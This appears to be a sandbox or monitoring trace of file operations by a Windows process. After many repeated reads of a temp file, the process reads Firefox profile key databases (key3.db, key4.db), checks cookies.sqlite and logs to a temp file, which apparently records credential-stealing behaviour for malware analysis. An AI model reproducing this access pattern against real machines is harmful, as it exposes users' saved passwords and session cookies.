File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 1024, size_out = 1024 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 1024, size_out = 1024 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
Fn
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
Fn
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
Fn
Data
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-journal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Read filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, size = 16, size_out = 16 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe-wal, type = file_attributes False 1
File Get Info filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe, type = size, size_out = 0 True 1
File Delete filename = c:\users\eebsym5\appdata\local\temp\qnoxhbltwxfe True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox, type = file_attributes True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini, file_attributes = _O_RDONLY True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 132 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = file_attributes False 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, size = 100, size_out = 0 False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-journal, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-wal, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-journal, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 2
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db-wal, type = file_attributes False 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key4.db, type = size, size_out = 0 True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 108 True 1
File Create filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, file_attributes = _O_RDONLY | _O_BINARY True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 60, size_out = 60 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 18, size_out = 18 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 20, size_out = 20 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 11, size_out = 11 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 52, size_out = 52 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 14, size_out = 14 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 1, size_out = 1 True 1
File Read filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles/h231daer.default\key3.db, size = 7, size_out = 7 True 1
File Create filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, file_attributes = _O_WRONLY | _O_APPEND True 1
File Write filename = c:\users\eebsym5\appdata\local\temp\mybrs.log, size = 123 True 1
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite, type = file_attributes True 1
